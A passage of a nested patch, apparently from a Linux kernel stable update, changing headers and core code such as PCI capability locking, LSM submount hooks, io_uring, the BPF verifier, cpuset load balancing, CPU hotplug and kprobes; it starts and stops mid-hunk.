++++ b/include/linux/arm_sdei.h
+@@ -47,10 +47,12 @@ int sdei_unregister_ghes(struct ghes *ghes);
+ int sdei_mask_local_cpu(void);
+ int sdei_unmask_local_cpu(void);
+ void __init sdei_init(void);
++void sdei_handler_abort(void);
+ #else
+ static inline int sdei_mask_local_cpu(void) { return 0; }
+ static inline int sdei_unmask_local_cpu(void) { return 0; }
+ static inline void sdei_init(void) { }
++static inline void sdei_handler_abort(void) { }
+ #endif /* CONFIG_ARM_SDE_INTERFACE */
+ 
+ 
+diff --git a/include/linux/blkdev.h b/include/linux/blkdev.h
+index 427e79ac72194..57674b3c58774 100644
+--- a/include/linux/blkdev.h
++++ b/include/linux/blkdev.h
+@@ -565,6 +565,7 @@ struct request_queue {
+ #define QUEUE_FLAG_NOXMERGES	9	/* No extended merges */
+ #define QUEUE_FLAG_ADD_RANDOM	10	/* Contributes to random pool */
+ #define QUEUE_FLAG_SAME_FORCE	12	/* force complete on same CPU */
++#define QUEUE_FLAG_HW_WC	18	/* Write back caching supported */
+ #define QUEUE_FLAG_INIT_DONE	14	/* queue is initialized */
+ #define QUEUE_FLAG_STABLE_WRITES 15	/* don't modify blks until WB is done */
+ #define QUEUE_FLAG_POLL		16	/* IO polling enabled if set */
+diff --git a/include/linux/clk-provider.h b/include/linux/clk-provider.h
+index 267cd06b54a01..aefb06373720f 100644
+--- a/include/linux/clk-provider.h
++++ b/include/linux/clk-provider.h
+@@ -1361,7 +1361,13 @@ struct clk_hw_onecell_data {
+ 	struct clk_hw *hws[];
+ };
+ 
+-#define CLK_OF_DECLARE(name, compat, fn) OF_DECLARE_1(clk, name, compat, fn)
++#define CLK_OF_DECLARE(name, compat, fn) \
++	static void __init __##name##_of_clk_init_declare(struct device_node *np) \
++	{								\
++		fn(np);							\
++		fwnode_dev_initialized(of_fwnode_handle(np), true);	\
++	}								\
++	OF_DECLARE_1(clk, name, compat, __##name##_of_clk_init_declare)
+ 
+ /*
+  * Use this macro when you have a driver that requires two initialization
+diff --git a/include/linux/hid.h b/include/linux/hid.h
+index 0a1ccc68e798a..784dd6b6046eb 100644
+--- a/include/linux/hid.h
++++ b/include/linux/hid.h
+@@ -357,6 +357,7 @@ struct hid_item {
+ #define HID_QUIRK_NO_OUTPUT_REPORTS_ON_INTR_EP	BIT(18)
+ #define HID_QUIRK_HAVE_SPECIAL_DRIVER		BIT(19)
+ #define HID_QUIRK_INCREMENT_USAGE_ON_DUPLICATE	BIT(20)
++#define HID_QUIRK_NOINVERT			BIT(21)
+ #define HID_QUIRK_FULLSPEED_INTERVAL		BIT(28)
+ #define HID_QUIRK_NO_INIT_REPORTS		BIT(29)
+ #define HID_QUIRK_NO_IGNORE			BIT(30)
+diff --git a/include/linux/if_arp.h b/include/linux/if_arp.h
+index 1ed52441972f9..10a1e81434cb9 100644
+--- a/include/linux/if_arp.h
++++ b/include/linux/if_arp.h
+@@ -53,6 +53,10 @@ static inline bool dev_is_mac_header_xmit(const struct net_device *dev)
+ 	case ARPHRD_NONE:
+ 	case ARPHRD_RAWIP:
+ 	case ARPHRD_PIMREG:
++	/* PPP adds its l2 header automatically in ppp_start_xmit().
++	 * This makes it look like an l3 device to __bpf_redirect() and tcf_mirred_init().
++	 */
++	case ARPHRD_PPP:
+ 		return false;
+ 	default:
+ 		return true;
+diff --git a/include/linux/ioport.h b/include/linux/ioport.h
+index 27642ca15d932..4ae3c541ea6f4 100644
+--- a/include/linux/ioport.h
++++ b/include/linux/ioport.h
+@@ -318,6 +318,8 @@ extern void __devm_release_region(struct device *dev, struct resource *parent,
+ 				  resource_size_t start, resource_size_t n);
+ extern int iomem_map_sanity_check(resource_size_t addr, unsigned long size);
+ extern bool iomem_is_exclusive(u64 addr);
++extern bool resource_is_exclusive(struct resource *resource, u64 addr,
++				  resource_size_t size);
+ 
+ extern int
+ walk_system_ram_range(unsigned long start_pfn, unsigned long nr_pages,
+diff --git a/include/linux/kernfs.h b/include/linux/kernfs.h
+index 73f5c120def88..2a36f3218b510 100644
+--- a/include/linux/kernfs.h
++++ b/include/linux/kernfs.h
+@@ -550,6 +550,10 @@ static inline int kernfs_setattr(struct kernfs_node *kn,
+ 				 const struct iattr *iattr)
+ { return -ENOSYS; }
+ 
++static inline __poll_t kernfs_generic_poll(struct kernfs_open_file *of,
++					   struct poll_table_struct *pt)
++{ return -ENOSYS; }
++
+ static inline void kernfs_notify(struct kernfs_node *kn) { }
+ 
+ static inline int kernfs_xattr_get(struct kernfs_node *kn, const char *name,
+diff --git a/include/linux/lsm_hook_defs.h b/include/linux/lsm_hook_defs.h
+index ec119da1d89b4..4a97a6db9bcec 100644
+--- a/include/linux/lsm_hook_defs.h
++++ b/include/linux/lsm_hook_defs.h
+@@ -54,6 +54,7 @@ LSM_HOOK(int, 0, bprm_creds_from_file, struct linux_binprm *bprm, struct file *f
+ LSM_HOOK(int, 0, bprm_check_security, struct linux_binprm *bprm)
+ LSM_HOOK(void, LSM_RET_VOID, bprm_committing_creds, struct linux_binprm *bprm)
+ LSM_HOOK(void, LSM_RET_VOID, bprm_committed_creds, struct linux_binprm *bprm)
++LSM_HOOK(int, 0, fs_context_submount, struct fs_context *fc, struct super_block *reference)
+ LSM_HOOK(int, 0, fs_context_dup, struct fs_context *fc,
+ 	 struct fs_context *src_sc)
+ LSM_HOOK(int, -ENOPARAM, fs_context_parse_param, struct fs_context *fc,
+diff --git a/include/linux/memcontrol.h b/include/linux/memcontrol.h
+index e039763029563..099521835cd14 100644
+--- a/include/linux/memcontrol.h
++++ b/include/linux/memcontrol.h
+@@ -283,6 +283,11 @@ struct mem_cgroup {
+ 	atomic_long_t		memory_events[MEMCG_NR_MEMORY_EVENTS];
+ 	atomic_long_t		memory_events_local[MEMCG_NR_MEMORY_EVENTS];
+ 
++	/*
++	 * Hint of reclaim pressure for socket memroy management. Note
++	 * that this indicator should NOT be used in legacy cgroup mode
++	 * where socket memory is accounted/charged separately.
++	 */
+ 	unsigned long		socket_pressure;
+ 
+ 	/* Legacy tcp memory accounting */
+@@ -1704,8 +1709,8 @@ void mem_cgroup_sk_alloc(struct sock *sk);
+ void mem_cgroup_sk_free(struct sock *sk);
+ static inline bool mem_cgroup_under_socket_pressure(struct mem_cgroup *memcg)
+ {
+-	if (!cgroup_subsys_on_dfl(memory_cgrp_subsys) && memcg->tcpmem_pressure)
+-		return true;
++	if (!cgroup_subsys_on_dfl(memory_cgrp_subsys))
++		return !!memcg->tcpmem_pressure;
+ 	do {
+ 		if (time_before(jiffies, READ_ONCE(memcg->socket_pressure)))
+ 			return true;
+diff --git a/include/linux/nfs_xdr.h b/include/linux/nfs_xdr.h
+index e86cf6642d212..2fd973d188c47 100644
+--- a/include/linux/nfs_xdr.h
++++ b/include/linux/nfs_xdr.h
+@@ -670,6 +670,7 @@ struct nfs_pgio_res {
+ 		struct {
+ 			unsigned int		replen;		/* used by read */
+ 			int			eof;		/* used by read */
++			void *			scratch;	/* used by read */
+ 		};
+ 		struct {
+ 			struct nfs_writeverf *	verf;		/* used by write */
+diff --git a/include/linux/nls.h b/include/linux/nls.h
+index 499e486b3722d..e0bf8367b274a 100644
+--- a/include/linux/nls.h
++++ b/include/linux/nls.h
+@@ -47,7 +47,7 @@ enum utf16_endian {
+ /* nls_base.c */
+ extern int __register_nls(struct nls_table *, struct module *);
+ extern int unregister_nls(struct nls_table *);
+-extern struct nls_table *load_nls(char *);
++extern struct nls_table *load_nls(const char *charset);
+ extern void unload_nls(struct nls_table *);
+ extern struct nls_table *load_nls_default(void);
+ #define register_nls(nls) __register_nls((nls), THIS_MODULE)
+diff --git a/include/linux/pci.h b/include/linux/pci.h
+index 9f617ffdb863f..eccaf1abea79d 100644
+--- a/include/linux/pci.h
++++ b/include/linux/pci.h
+@@ -409,6 +409,7 @@ struct pci_dev {
+ 	 */
+ 	unsigned int	irq;
+ 	struct resource resource[DEVICE_COUNT_RESOURCE]; /* I/O and memory regions + expansion ROMs */
++	struct resource driver_exclusive_resource;	 /* driver exclusive resource ranges */
+ 
+ 	bool		match_driver;		/* Skip attaching driver */
+ 
+@@ -465,6 +466,7 @@ struct pci_dev {
+ 	pci_dev_flags_t dev_flags;
+ 	atomic_t	enable_cnt;	/* pci_enable_device has been called */
+ 
++	spinlock_t	pcie_cap_lock;		/* Protects RMW ops in capability accessors */
+ 	u32		saved_config_space[16]; /* Config space saved at suspend time */
+ 	struct hlist_head saved_cap_space;
+ 	int		rom_attr_enabled;	/* Display of ROM attribute enabled? */
+@@ -1208,11 +1210,40 @@ int pcie_capability_read_word(struct pci_dev *dev, int pos, u16 *val);
+ int pcie_capability_read_dword(struct pci_dev *dev, int pos, u32 *val);
+ int pcie_capability_write_word(struct pci_dev *dev, int pos, u16 val);
+ int pcie_capability_write_dword(struct pci_dev *dev, int pos, u32 val);
+-int pcie_capability_clear_and_set_word(struct pci_dev *dev, int pos,
+-				       u16 clear, u16 set);
++int pcie_capability_clear_and_set_word_unlocked(struct pci_dev *dev, int pos,
++						u16 clear, u16 set);
++int pcie_capability_clear_and_set_word_locked(struct pci_dev *dev, int pos,
++					      u16 clear, u16 set);
+ int pcie_capability_clear_and_set_dword(struct pci_dev *dev, int pos,
+ 					u32 clear, u32 set);
+ 
++/**
++ * pcie_capability_clear_and_set_word - RMW accessor for PCI Express Capability Registers
++ * @dev:	PCI device structure of the PCI Express device
++ * @pos:	PCI Express Capability Register
++ * @clear:	Clear bitmask
++ * @set:	Set bitmask
++ *
++ * Perform a Read-Modify-Write (RMW) operation using @clear and @set
++ * bitmasks on PCI Express Capability Register at @pos. Certain PCI Express
++ * Capability Registers are accessed concurrently in RMW fashion, hence
++ * require locking which is handled transparently to the caller.
++ */
++static inline int pcie_capability_clear_and_set_word(struct pci_dev *dev,
++						     int pos,
++						     u16 clear, u16 set)
++{
++	switch (pos) {
++	case PCI_EXP_LNKCTL:
++	case PCI_EXP_RTCTL:
++		return pcie_capability_clear_and_set_word_locked(dev, pos,
++								 clear, set);
++	default:
++		return pcie_capability_clear_and_set_word_unlocked(dev, pos,
++								   clear, set);
++	}
++}
++
+ static inline int pcie_capability_set_word(struct pci_dev *dev, int pos,
+ 					   u16 set)
+ {
+@@ -1408,6 +1439,21 @@ int pci_request_selected_regions(struct pci_dev *, int, const char *);
+ int pci_request_selected_regions_exclusive(struct pci_dev *, int, const char *);
+ void pci_release_selected_regions(struct pci_dev *, int);
+ 
++static inline __must_check struct resource *
++pci_request_config_region_exclusive(struct pci_dev *pdev, unsigned int offset,
++				    unsigned int len, const char *name)
++{
++	return __request_region(&pdev->driver_exclusive_resource, offset, len,
++				name, IORESOURCE_EXCLUSIVE);
++}
++
++static inline void pci_release_config_region(struct pci_dev *pdev,
++					     unsigned int offset,
++					     unsigned int len)
++{
++	__release_region(&pdev->driver_exclusive_resource, offset, len);
++}
++
+ /* drivers/pci/bus.c */
+ void pci_add_resource(struct list_head *resources, struct resource *res);
+ void pci_add_resource_offset(struct list_head *resources, struct resource *res,
+@@ -2487,6 +2533,7 @@ void pci_uevent_ers(struct pci_dev *pdev, enum  pci_ers_result err_type);
+ #define pci_crit(pdev, fmt, arg...)	dev_crit(&(pdev)->dev, fmt, ##arg)
+ #define pci_err(pdev, fmt, arg...)	dev_err(&(pdev)->dev, fmt, ##arg)
+ #define pci_warn(pdev, fmt, arg...)	dev_warn(&(pdev)->dev, fmt, ##arg)
++#define pci_warn_once(pdev, fmt, arg...) dev_warn_once(&(pdev)->dev, fmt, ##arg)
+ #define pci_notice(pdev, fmt, arg...)	dev_notice(&(pdev)->dev, fmt, ##arg)
+ #define pci_info(pdev, fmt, arg...)	dev_info(&(pdev)->dev, fmt, ##arg)
+ #define pci_dbg(pdev, fmt, arg...)	dev_dbg(&(pdev)->dev, fmt, ##arg)
+diff --git a/include/linux/security.h b/include/linux/security.h
+index ca1b7109c0dbb..a6c97cc57caa0 100644
+--- a/include/linux/security.h
++++ b/include/linux/security.h
+@@ -293,6 +293,7 @@ int security_bprm_creds_from_file(struct linux_binprm *bprm, struct file *file);
+ int security_bprm_check(struct linux_binprm *bprm);
+ void security_bprm_committing_creds(struct linux_binprm *bprm);
+ void security_bprm_committed_creds(struct linux_binprm *bprm);
++int security_fs_context_submount(struct fs_context *fc, struct super_block *reference);
+ int security_fs_context_dup(struct fs_context *fc, struct fs_context *src_fc);
+ int security_fs_context_parse_param(struct fs_context *fc, struct fs_parameter *param);
+ int security_sb_alloc(struct super_block *sb);
+@@ -625,6 +626,11 @@ static inline void security_bprm_committed_creds(struct linux_binprm *bprm)
+ {
+ }
+ 
++static inline int security_fs_context_submount(struct fs_context *fc,
++					   struct super_block *reference)
++{
++	return 0;
++}
+ static inline int security_fs_context_dup(struct fs_context *fc,
+ 					  struct fs_context *src_fc)
+ {
+diff --git a/include/linux/trace_events.h b/include/linux/trace_events.h
+index 04c59f8d801f1..422f4ca656cf9 100644
+--- a/include/linux/trace_events.h
++++ b/include/linux/trace_events.h
+@@ -863,7 +863,8 @@ extern int  perf_uprobe_init(struct perf_event *event,
+ extern void perf_uprobe_destroy(struct perf_event *event);
+ extern int bpf_get_uprobe_info(const struct perf_event *event,
+ 			       u32 *fd_type, const char **filename,
+-			       u64 *probe_offset, bool perf_type_tracepoint);
++			       u64 *probe_offset, u64 *probe_addr,
++			       bool perf_type_tracepoint);
+ #endif
+ extern int  ftrace_profile_set_filter(struct perf_event *event, int event_id,
+ 				     char *filter_str);
+diff --git a/include/linux/usb/typec_altmode.h b/include/linux/usb/typec_altmode.h
+index 350d49012659b..28aeef8f9e7b5 100644
+--- a/include/linux/usb/typec_altmode.h
++++ b/include/linux/usb/typec_altmode.h
+@@ -67,7 +67,7 @@ struct typec_altmode_ops {
+ 
+ int typec_altmode_enter(struct typec_altmode *altmode, u32 *vdo);
+ int typec_altmode_exit(struct typec_altmode *altmode);
+-void typec_altmode_attention(struct typec_altmode *altmode, u32 vdo);
++int typec_altmode_attention(struct typec_altmode *altmode, u32 vdo);
+ int typec_altmode_vdm(struct typec_altmode *altmode,
+ 		      const u32 header, const u32 *vdo, int count);
+ int typec_altmode_notify(struct typec_altmode *altmode, unsigned long conf,
+diff --git a/include/media/cec.h b/include/media/cec.h
+index abee41ae02d0e..9c007f83569aa 100644
+--- a/include/media/cec.h
++++ b/include/media/cec.h
+@@ -113,22 +113,25 @@ struct cec_fh {
+ #define CEC_FREE_TIME_TO_USEC(ft)		((ft) * 2400)
+ 
+ struct cec_adap_ops {
+-	/* Low-level callbacks */
++	/* Low-level callbacks, called with adap->lock held */
+ 	int (*adap_enable)(struct cec_adapter *adap, bool enable);
+ 	int (*adap_monitor_all_enable)(struct cec_adapter *adap, bool enable);
+ 	int (*adap_monitor_pin_enable)(struct cec_adapter *adap, bool enable);
+ 	int (*adap_log_addr)(struct cec_adapter *adap, u8 logical_addr);
+-	void (*adap_configured)(struct cec_adapter *adap, bool configured);
++	void (*adap_unconfigured)(struct cec_adapter *adap);
+ 	int (*adap_transmit)(struct cec_adapter *adap, u8 attempts,
+ 			     u32 signal_free_time, struct cec_msg *msg);
++	void (*adap_nb_transmit_canceled)(struct cec_adapter *adap,
++					  const struct cec_msg *msg);
+ 	void (*adap_status)(struct cec_adapter *adap, struct seq_file *file);
+ 	void (*adap_free)(struct cec_adapter *adap);
+ 
+-	/* Error injection callbacks */
++	/* Error injection callbacks, called without adap->lock held */
+ 	int (*error_inj_show)(struct cec_adapter *adap, struct seq_file *sf);
+ 	bool (*error_inj_parse_line)(struct cec_adapter *adap, char *line);
+ 
+-	/* High-level CEC message callback */
++	/* High-level CEC message callback, called without adap->lock held */
++	void (*configured)(struct cec_adapter *adap);
+ 	int (*received)(struct cec_adapter *adap, struct cec_msg *msg);
+ };
+ 
+diff --git a/include/net/lwtunnel.h b/include/net/lwtunnel.h
+index 6f15e6fa154e6..53bd2d02a4f0d 100644
+--- a/include/net/lwtunnel.h
++++ b/include/net/lwtunnel.h
+@@ -16,9 +16,12 @@
+ #define LWTUNNEL_STATE_INPUT_REDIRECT	BIT(1)
+ #define LWTUNNEL_STATE_XMIT_REDIRECT	BIT(2)
+ 
++/* LWTUNNEL_XMIT_CONTINUE should be distinguishable from dst_output return
++ * values (NET_XMIT_xxx and NETDEV_TX_xxx in linux/netdevice.h) for safety.
++ */
+ enum {
+ 	LWTUNNEL_XMIT_DONE,
+-	LWTUNNEL_XMIT_CONTINUE,
++	LWTUNNEL_XMIT_CONTINUE = 0x100,
+ };
+ 
+ 
+diff --git a/include/net/mac80211.h b/include/net/mac80211.h
+index 8a338c33118f9..43173204d6d5e 100644
+--- a/include/net/mac80211.h
++++ b/include/net/mac80211.h
+@@ -1141,9 +1141,11 @@ struct ieee80211_tx_info {
+ 			u8 ampdu_ack_len;
+ 			u8 ampdu_len;
+ 			u8 antenna;
++			u8 pad;
+ 			u16 tx_time;
+ 			u8 flags;
+-			void *status_driver_data[18 / sizeof(void *)];
++			u8 pad2;
++			void *status_driver_data[16 / sizeof(void *)];
+ 		} status;
+ 		struct {
+ 			struct ieee80211_tx_rate driver_rates[
+diff --git a/include/net/tcp.h b/include/net/tcp.h
+index e9c8f88f47696..5fd69f2342a44 100644
+--- a/include/net/tcp.h
++++ b/include/net/tcp.h
+@@ -355,7 +355,6 @@ ssize_t tcp_splice_read(struct socket *sk, loff_t *ppos,
+ struct sk_buff *tcp_stream_alloc_skb(struct sock *sk, int size, gfp_t gfp,
+ 				     bool force_schedule);
+ 
+-void tcp_enter_quickack_mode(struct sock *sk, unsigned int max_quickacks);
+ static inline void tcp_dec_quickack_mode(struct sock *sk,
+ 					 const unsigned int pkts)
+ {
+diff --git a/include/scsi/scsi_host.h b/include/scsi/scsi_host.h
+index fcf25f1642a3a..d27d9fb7174c8 100644
+--- a/include/scsi/scsi_host.h
++++ b/include/scsi/scsi_host.h
+@@ -757,7 +757,7 @@ extern void scsi_remove_host(struct Scsi_Host *);
+ extern struct Scsi_Host *scsi_host_get(struct Scsi_Host *);
+ extern int scsi_host_busy(struct Scsi_Host *shost);
+ extern void scsi_host_put(struct Scsi_Host *t);
+-extern struct Scsi_Host *scsi_host_lookup(unsigned short);
++extern struct Scsi_Host *scsi_host_lookup(unsigned int hostnum);
+ extern const char *scsi_host_state_name(enum scsi_host_state);
+ extern void scsi_host_complete_all_commands(struct Scsi_Host *shost,
+ 					    enum scsi_host_status status);
+diff --git a/include/uapi/linux/sync_file.h b/include/uapi/linux/sync_file.h
+index ee2dcfb3d6602..d7f7c04a6e0c1 100644
+--- a/include/uapi/linux/sync_file.h
++++ b/include/uapi/linux/sync_file.h
+@@ -52,7 +52,7 @@ struct sync_fence_info {
+  * @name:	name of fence
+  * @status:	status of fence. 1: signaled 0:active <0:error
+  * @flags:	sync_file_info flags
+- * @num_fences	number of fences in the sync_file
++ * @num_fences:	number of fences in the sync_file
+  * @pad:	padding for 64-bit alignment, should always be zero
+  * @sync_fence_info: pointer to array of structs sync_fence_info with all
+  *		 fences in the sync_file
+diff --git a/include/uapi/linux/v4l2-controls.h b/include/uapi/linux/v4l2-controls.h
+index b5e7d082b8adf..d4a4e3cab3c2a 100644
+--- a/include/uapi/linux/v4l2-controls.h
++++ b/include/uapi/linux/v4l2-controls.h
+@@ -2411,6 +2411,9 @@ struct v4l2_ctrl_hevc_slice_params {
+  * @poc_st_curr_after: provides the index of the short term after references
+  *		       in DPB array
+  * @poc_lt_curr: provides the index of the long term references in DPB array
++ * @num_delta_pocs_of_ref_rps_idx: same as the derived value NumDeltaPocs[RefRpsIdx],
++ *				   can be used to parse the RPS data in slice headers
++ *				   instead of skipping it with @short_term_ref_pic_set_size.
+  * @reserved: padding field. Should be zeroed by applications.
+  * @dpb: the decoded picture buffer, for meta-data about reference frames
+  * @flags: see V4L2_HEVC_DECODE_PARAM_FLAG_{}
+@@ -2426,7 +2429,8 @@ struct v4l2_ctrl_hevc_decode_params {
+ 	__u8	poc_st_curr_before[V4L2_HEVC_DPB_ENTRIES_NUM_MAX];
+ 	__u8	poc_st_curr_after[V4L2_HEVC_DPB_ENTRIES_NUM_MAX];
+ 	__u8	poc_lt_curr[V4L2_HEVC_DPB_ENTRIES_NUM_MAX];
+-	__u8	reserved[4];
++	__u8	num_delta_pocs_of_ref_rps_idx;
++	__u8	reserved[3];
+ 	struct	v4l2_hevc_dpb_entry dpb[V4L2_HEVC_DPB_ENTRIES_NUM_MAX];
+ 	__u64	flags;
+ };
+diff --git a/init/Kconfig b/init/Kconfig
+index 2028ed4d50f5b..de255842f5d09 100644
+--- a/init/Kconfig
++++ b/init/Kconfig
+@@ -627,6 +627,7 @@ config TASK_IO_ACCOUNTING
+ 
+ config PSI
+ 	bool "Pressure stall information tracking"
++	select KERNFS
+ 	help
+ 	  Collect metrics that indicate how overcommitted the CPU, memory,
+ 	  and IO capacity are in the system.
+diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
+index b0e47fe1eb4bb..6d455e2428b90 100644
+--- a/io_uring/io_uring.c
++++ b/io_uring/io_uring.c
+@@ -1457,6 +1457,9 @@ static int io_iopoll_check(struct io_ring_ctx *ctx, long min)
+ 			break;
+ 		nr_events += ret;
+ 		ret = 0;
++
++		if (task_sigpending(current))
++			return -EINTR;
+ 	} while (nr_events < min && !need_resched());
+ 
+ 	return ret;
+@@ -2240,7 +2243,9 @@ static const struct io_uring_sqe *io_get_sqe(struct io_ring_ctx *ctx)
+ 	}
+ 
+ 	/* drop invalid entries */
++	spin_lock(&ctx->completion_lock);
+ 	ctx->cq_extra--;
++	spin_unlock(&ctx->completion_lock);
+ 	WRITE_ONCE(ctx->rings->sq_dropped,
+ 		   READ_ONCE(ctx->rings->sq_dropped) + 1);
+ 	return NULL;
+diff --git a/kernel/auditsc.c b/kernel/auditsc.c
+index 9f8c05228d6d6..a2240f54fc224 100644
+--- a/kernel/auditsc.c
++++ b/kernel/auditsc.c
+@@ -2456,6 +2456,8 @@ void __audit_inode_child(struct inode *parent,
+ 		}
+ 	}
+ 
++	cond_resched();
++
+ 	/* is there a matching child entry? */
+ 	list_for_each_entry(n, &context->names_list, list) {
+ 		/* can only match entries that have a name */
+diff --git a/kernel/bpf/btf.c b/kernel/bpf/btf.c
+index fb78bb26786fc..7582ec4fd4131 100644
+--- a/kernel/bpf/btf.c
++++ b/kernel/bpf/btf.c
+@@ -5788,7 +5788,7 @@ error:
+ 		 * that also allows using an array of int as a scratch
+ 		 * space. e.g. skb->cb[].
+ 		 */
+-		if (off + size > mtrue_end) {
++		if (off + size > mtrue_end && !(*flag & PTR_UNTRUSTED)) {
+ 			bpf_log(log,
+ 				"access beyond the end of member %s (mend:%u) in struct %s with off %u size %u\n",
+ 				mname, mtrue_end, tname, off, size);
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 3c414e0ac819e..3052680201e57 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -10401,6 +10401,12 @@ static int check_cond_jmp_op(struct bpf_verifier_env *env,
+ 		return -EINVAL;
+ 	}
+ 
++	/* check src2 operand */
++	err = check_reg_arg(env, insn->dst_reg, SRC_OP);
++	if (err)
++		return err;
++
++	dst_reg = &regs[insn->dst_reg];
+ 	if (BPF_SRC(insn->code) == BPF_X) {
+ 		if (insn->imm != 0) {
+ 			verbose(env, "BPF_JMP/JMP32 uses reserved fields\n");
+@@ -10412,12 +10418,13 @@ static int check_cond_jmp_op(struct bpf_verifier_env *env,
+ 		if (err)
+ 			return err;
+ 
+-		if (is_pointer_value(env, insn->src_reg)) {
++		src_reg = &regs[insn->src_reg];
++		if (!(reg_is_pkt_pointer_any(dst_reg) && reg_is_pkt_pointer_any(src_reg)) &&
++		    is_pointer_value(env, insn->src_reg)) {
+ 			verbose(env, "R%d pointer comparison prohibited\n",
+ 				insn->src_reg);
+ 			return -EACCES;
+ 		}
+-		src_reg = &regs[insn->src_reg];
+ 	} else {
+ 		if (insn->src_reg != BPF_REG_0) {
+ 			verbose(env, "BPF_JMP/JMP32 uses reserved fields\n");
+@@ -10425,12 +10432,6 @@ static int check_cond_jmp_op(struct bpf_verifier_env *env,
+ 		}
+ 	}
+ 
+-	/* check src2 operand */
+-	err = check_reg_arg(env, insn->dst_reg, SRC_OP);
+-	if (err)
+-		return err;
+-
+-	dst_reg = &regs[insn->dst_reg];
+ 	is_jmp32 = BPF_CLASS(insn->code) == BPF_JMP32;
+ 
+ 	if (BPF_SRC(insn->code) == BPF_K) {
+diff --git a/kernel/cgroup/cpuset.c b/kernel/cgroup/cpuset.c
+index db3e05b6b4dd2..79e6a5d4c29a1 100644
+--- a/kernel/cgroup/cpuset.c
++++ b/kernel/cgroup/cpuset.c
+@@ -1606,11 +1606,16 @@ static void update_cpumasks_hier(struct cpuset *cs, struct tmpmasks *tmp,
+ 		}
+ 
+ 		/*
+-		 * Skip the whole subtree if the cpumask remains the same
+-		 * and has no partition root state and force flag not set.
++		 * Skip the whole subtree if
++		 * 1) the cpumask remains the same,
++		 * 2) has no partition root state,
++		 * 3) force flag not set, and
++		 * 4) for v2 load balance state same as its parent.
+ 		 */
+ 		if (!cp->partition_root_state && !force &&
+-		    cpumask_equal(tmp->new_cpus, cp->effective_cpus)) {
++		    cpumask_equal(tmp->new_cpus, cp->effective_cpus) &&
++		    (!cgroup_subsys_on_dfl(cpuset_cgrp_subsys) ||
++		    (is_sched_load_balance(parent) == is_sched_load_balance(cp)))) {
+ 			pos_css = css_rightmost_descendant(pos_css);
+ 			continue;
+ 		}
+@@ -1693,6 +1698,20 @@ update_parent_subparts:
+ 
+ 		update_tasks_cpumask(cp, tmp->new_cpus);
+ 
++		/*
++		 * On default hierarchy, inherit the CS_SCHED_LOAD_BALANCE
++		 * from parent if current cpuset isn't a valid partition root
++		 * and their load balance states differ.
++		 */
++		if (cgroup_subsys_on_dfl(cpuset_cgrp_subsys) &&
++		    !is_partition_valid(cp) &&
++		    (is_sched_load_balance(parent) != is_sched_load_balance(cp))) {
++			if (is_sched_load_balance(parent))
++				set_bit(CS_SCHED_LOAD_BALANCE, &cp->flags);
++			else
++				clear_bit(CS_SCHED_LOAD_BALANCE, &cp->flags);
++		}
++
+ 		/*
+ 		 * On legacy hierarchy, if the effective cpumask of any non-
+ 		 * empty cpuset is changed, we need to rebuild sched domains.
+@@ -3213,6 +3232,14 @@ static int cpuset_css_online(struct cgroup_subsys_state *css)
+ 		cs->use_parent_ecpus = true;
+ 		parent->child_ecpus_count++;
+ 	}
++
++	/*
++	 * For v2, clear CS_SCHED_LOAD_BALANCE if parent is isolated
++	 */
++	if (cgroup_subsys_on_dfl(cpuset_cgrp_subsys) &&
++	    !is_sched_load_balance(parent))
++		clear_bit(CS_SCHED_LOAD_BALANCE, &cs->flags);
++
+ 	spin_unlock_irq(&callback_lock);
+ 
+ 	if (!test_bit(CGRP_CPUSET_CLONE_CHILDREN, &css->cgroup->flags))
+diff --git a/kernel/cgroup/namespace.c b/kernel/cgroup/namespace.c
+index 0d5c29879a50b..144a464e45c66 100644
+--- a/kernel/cgroup/namespace.c
++++ b/kernel/cgroup/namespace.c
+@@ -149,9 +149,3 @@ const struct proc_ns_operations cgroupns_operations = {
+ 	.install	= cgroupns_install,
+ 	.owner		= cgroupns_owner,
+ };
+-
+-static __init int cgroup_namespaces_init(void)
+-{
+-	return 0;
+-}
+-subsys_initcall(cgroup_namespaces_init);
+diff --git a/kernel/cpu.c b/kernel/cpu.c
+index 98a7a7b1471b7..f8eb1825f704f 100644
+--- a/kernel/cpu.c
++++ b/kernel/cpu.c
+@@ -1215,8 +1215,22 @@ out:
+ 	return ret;
+ }
+ 
++struct cpu_down_work {
++	unsigned int		cpu;
++	enum cpuhp_state	target;
++};
++
++static long __cpu_down_maps_locked(void *arg)
++{
++	struct cpu_down_work *work = arg;
++
++	return _cpu_down(work->cpu, 0, work->target);
++}
++
+ static int cpu_down_maps_locked(unsigned int cpu, enum cpuhp_state target)
+ {
++	struct cpu_down_work work = { .cpu = cpu, .target = target, };
++
+ 	/*
+ 	 * If the platform does not support hotplug, report it explicitly to
+ 	 * differentiate it from a transient offlining failure.
+@@ -1225,7 +1239,15 @@ static int cpu_down_maps_locked(unsigned int cpu, enum cpuhp_state target)
+ 		return -EOPNOTSUPP;
+ 	if (cpu_hotplug_disabled)
+ 		return -EBUSY;
+-	return _cpu_down(cpu, 0, target);
++
++	/*
++	 * Ensure that the control task does not run on the to be offlined
++	 * CPU to prevent a deadlock against cfs_b->period_timer.
++	 */
++	cpu = cpumask_any_but(cpu_online_mask, cpu);
++	if (cpu >= nr_cpu_ids)
++		return -EBUSY;
++	return work_on_cpu(cpu, __cpu_down_maps_locked, &work);
+ }
+ 
+ static int cpu_down(unsigned int cpu, enum cpuhp_state target)
+diff --git a/kernel/kprobes.c b/kernel/kprobes.c
+index 00e177de91ccd..3da9726232ff9 100644
+--- a/kernel/kprobes.c
++++ b/kernel/kprobes.c
+@@ -1545,6 +1545,17 @@ static int check_ftrace_location(struct kprobe *p)
+ 	return 0;
+ }
+ 
++static bool is_cfi_preamble_symbol(unsigned long addr)
++{
++	char symbuf[KSYM_NAME_LEN];
++
++	if (lookup_symbol_name(addr, symbuf))
++		return false;
++
++	return str_has_prefix("__cfi_", symbuf) ||
++		str_has_prefix("__pfx_", symbuf);
++}
++
+ static int check_kprobe_address_safe(struct kprobe *p,
+ 				     struct module **probed_mod)
+ {
+@@ -1563,7 +1574,8 @@ static int check_kprobe_address_safe(struct kprobe *p,
+ 	    within_kprobe_blacklist((unsigned long) p->addr) ||
+ 	    jump_label_text_reserved(p->addr, p->addr) ||
+ 	    static_call_text_reserved(p->addr, p->addr) ||
+-	    find_bug((unsigned long)p->addr)) {
++	    find_bug((unsigned long)p->addr) ||
